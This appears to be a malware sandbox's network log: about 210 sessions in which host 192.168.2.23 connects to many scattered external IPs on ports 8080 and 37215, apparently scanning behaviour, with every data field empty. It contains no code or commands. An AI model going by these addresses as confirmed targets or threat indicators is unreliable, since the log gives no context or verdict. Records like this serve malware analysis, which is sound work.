                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28537192.168.2.2336028220.68.231.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28538192.168.2.2359452186.255.221.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28539192.168.2.233953650.132.191.2168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28540192.168.2.2349414140.226.15.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28541192.168.2.2333766148.77.253.1658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28542192.168.2.2353554125.199.224.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28543192.168.2.2342026157.82.83.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28544192.168.2.2349386114.0.159.58080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28545192.168.2.234235841.189.205.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28546192.168.2.2337510126.79.144.1248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28547192.168.2.235656844.225.33.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28548192.168.2.2347360134.24.87.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28549192.168.2.2357562151.205.56.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28550192.168.2.2349126156.191.65.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28551192.168.2.23525521.105.239.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28552192.168.2.2333190162.71.9.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28553192.168.2.235831223.44.155.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28554192.168.2.2334458210.16.158.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28555192.168.2.23396908.252.202.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28556192.168.2.2355716104.30.201.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28557192.168.2.2351682117.79.34.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28558192.168.2.2352560192.221.197.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28559192.168.2.2348194220.64.70.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28560192.168.2.233774290.125.157.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28561192.168.2.2357276120.193.131.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28562192.168.2.2347944186.168.182.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28563192.168.2.235756666.132.24.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28564192.168.2.2335698223.32.236.2368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28565192.168.2.233828285.141.186.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28566192.168.2.2346786121.99.228.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28567192.168.2.2353936169.143.10.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28568192.168.2.233658679.9.84.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28569192.168.2.2348236170.233.18.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28570192.168.2.2338110195.15.253.478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28571192.168.2.234735692.172.122.2368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28572192.168.2.2353946138.35.15.1928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28573192.168.2.2344922179.251.148.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28574192.168.2.2346034114.186.214.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28575192.168.2.235299236.113.78.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28576192.168.2.235575640.18.110.1798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28577192.168.2.23437465.52.136.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28578192.168.2.233780093.126.15.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28579192.168.2.2335930115.170.22.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28580192.168.2.2333498187.0.132.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28581192.168.2.2356120213.55.184.1088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28582192.168.2.2345748200.116.33.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28583192.168.2.2337660182.35.124.1288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28584192.168.2.235478634.18.93.2468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28585192.168.2.2358428170.135.151.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28586192.168.2.2348588207.15.168.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28587192.168.2.2348136179.96.118.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28588192.168.2.2333898159.0.119.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28589192.168.2.235397497.185.195.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28590192.168.2.234511087.59.205.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28591192.168.2.2337846191.68.44.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28592192.168.2.234968039.214.199.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28593192.168.2.234244495.50.61.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28594192.168.2.2344076135.21.39.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28595192.168.2.2333556183.40.141.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28596192.168.2.2345484114.64.72.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28597192.168.2.236048085.199.183.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28598192.168.2.234524440.146.253.58080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28599192.168.2.2339876118.151.133.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28600192.168.2.2355918162.225.212.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28601192.168.2.234244027.1.24.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28602192.168.2.2334422198.27.154.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28603192.168.2.2335608111.41.1.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28604192.168.2.23437705.244.124.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28605192.168.2.2346038182.246.210.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28606192.168.2.2360484112.28.207.2268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28607192.168.2.234448031.167.150.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28608192.168.2.234167862.106.49.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28609192.168.2.2347576123.191.32.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28610192.168.2.234719683.188.17.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28611192.168.2.2346436209.168.122.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28612192.168.2.234591236.74.35.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28613192.168.2.23341121.54.128.2408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28614192.168.2.2334586146.73.178.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28615192.168.2.234735032.24.56.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28616192.168.2.2337444171.143.79.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28617192.168.2.235373662.121.97.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28618192.168.2.233370661.192.218.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28619192.168.2.235028668.222.165.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28620192.168.2.2339172200.86.161.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28621192.168.2.235370212.170.151.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28622192.168.2.23591429.110.166.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28623192.168.2.2346394123.168.160.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28624192.168.2.233776252.73.84.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28625192.168.2.23369068.26.205.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28626192.168.2.2343686175.83.99.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28627192.168.2.2346576168.229.93.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28628192.168.2.235912627.189.223.2508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28629192.168.2.234410449.140.226.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28630192.168.2.236044049.141.99.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28631192.168.2.2337656130.76.157.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28632192.168.2.2334496174.67.97.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28633192.168.2.2349424168.114.200.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28634192.168.2.2338900181.236.185.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28635192.168.2.2357060111.70.30.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28636192.168.2.2334762164.253.116.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28637192.168.2.2357778136.34.122.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28638192.168.2.233827892.207.227.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28639192.168.2.233525458.110.20.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28640192.168.2.2335632123.43.132.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28641192.168.2.2338064181.229.249.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28642192.168.2.235901288.6.131.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28643192.168.2.2334842130.88.150.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28644192.168.2.2344798223.1.62.2468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28645192.168.2.234839676.175.110.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28646192.168.2.233660237.127.127.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28647192.168.2.2340590101.225.163.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28648192.168.2.233310636.44.178.258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28649192.168.2.235448885.100.236.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28650192.168.2.2358082222.27.203.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28651192.168.2.2353938105.57.46.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28652192.168.2.235754692.7.56.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28653192.168.2.2347010145.28.127.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28654192.168.2.2357354170.18.175.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28655192.168.2.2345710149.246.43.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28656192.168.2.2353180164.12.46.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28657192.168.2.2347916136.59.90.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28658192.168.2.2356810205.9.69.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28659192.168.2.23557642.155.192.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28660192.168.2.2352796106.89.14.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28661192.168.2.2346490197.28.250.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28662192.168.2.235814248.193.18.2138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28663192.168.2.2341674216.2.244.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28664192.168.2.235770232.53.171.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28665192.168.2.234463088.186.146.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28666192.168.2.2345186124.40.239.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28667192.168.2.2360848181.49.155.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28668192.168.2.2347336182.72.105.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28669192.168.2.2333034204.128.20.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28670192.168.2.2360494111.246.149.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28671192.168.2.236020031.210.37.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28672192.168.2.2358742112.146.39.23937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28673192.168.2.2335372197.62.61.18837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28674192.168.2.2353010112.117.59.22237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28675192.168.2.2347104211.119.247.4537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28676192.168.2.234386241.85.174.11937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28677192.168.2.2337684157.68.194.22437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28678192.168.2.2334120197.223.255.10637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28679192.168.2.2358522197.63.206.16537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28680192.168.2.235135441.36.26.20837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28681192.168.2.2343852197.86.227.6237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28682192.168.2.2358074157.152.122.5137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28683192.168.2.2341234197.72.18.4837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28684192.168.2.2345362197.55.55.3737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28685192.168.2.233589041.214.233.17137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28686192.168.2.2350122197.65.202.7937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28687192.168.2.2348762197.82.125.14037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28688192.168.2.233683641.47.140.19337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28689192.168.2.2360950124.199.158.19137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28690192.168.2.234130841.20.154.15837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28691192.168.2.2352662194.233.244.18637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28692192.168.2.2333930157.75.212.14637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28693192.168.2.235093841.74.108.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28694192.168.2.234750241.8.60.13237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28695192.168.2.235645841.252.252.20637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28696192.168.2.2351828157.21.196.13237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28697192.168.2.235932089.47.153.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28698192.168.2.2337418198.218.150.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28699192.168.2.2360596197.46.50.9137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28700192.168.2.234735658.244.211.14037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28701192.168.2.2354020157.40.107.23537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28702192.168.2.2345052157.253.117.16837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28703192.168.2.2359986157.73.6.10637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28704192.168.2.235404241.158.29.15637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28705192.168.2.2346086172.4.37.14837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28706192.168.2.2339236197.252.137.8737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28707192.168.2.233880849.97.16.12837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28708192.168.2.234154241.82.200.14837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28709192.168.2.234757241.22.11.20937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28710192.168.2.234552241.189.17.6837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28711192.168.2.2355274139.34.170.3137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28712192.168.2.2348122190.158.126.9537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28713192.168.2.2336210157.100.172.15537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28714192.168.2.234021041.219.109.1937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28715192.168.2.2356168157.218.8.8637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28716192.168.2.2355392157.213.135.24037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28717192.168.2.2339602174.201.233.24137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28718192.168.2.2348556197.231.185.13837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28719192.168.2.2345004197.182.214.5337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28720192.168.2.234419841.9.191.11237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28721192.168.2.2341962197.232.216.1237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28722192.168.2.2337598197.123.155.17537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28723192.168.2.2339736197.61.249.8337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28724192.168.2.2333474157.88.118.23637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28725192.168.2.2340314157.248.252.2737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28726192.168.2.235598274.93.143.2437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28727192.168.2.235170441.213.120.8437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28728192.168.2.233777441.52.49.14737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28729192.168.2.2341842157.66.157.25437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28730192.168.2.2353278157.251.38.11437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28731192.168.2.2341374185.217.145.1737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28732192.168.2.236002241.109.105.22937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28733192.168.2.2357106197.228.58.22437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28734192.168.2.235458641.151.163.19937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28735192.168.2.2336184197.137.40.3737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28736192.168.2.235062637.101.80.3837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28737192.168.2.2346066157.219.81.15037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28738192.168.2.2338434116.173.17.15737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28739192.168.2.2349050183.249.43.16237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28740192.168.2.2350876157.199.217.2437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28741192.168.2.2347568198.191.242.12137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28742192.168.2.233425413.168.22.23037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28743192.168.2.235243641.34.43.18237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28744192.168.2.2354662157.252.179.237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28745192.168.2.2338376157.87.49.22437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28746192.168.2.233412641.233.106.25437215
                                                        TimestampBytes transferredDirectionData


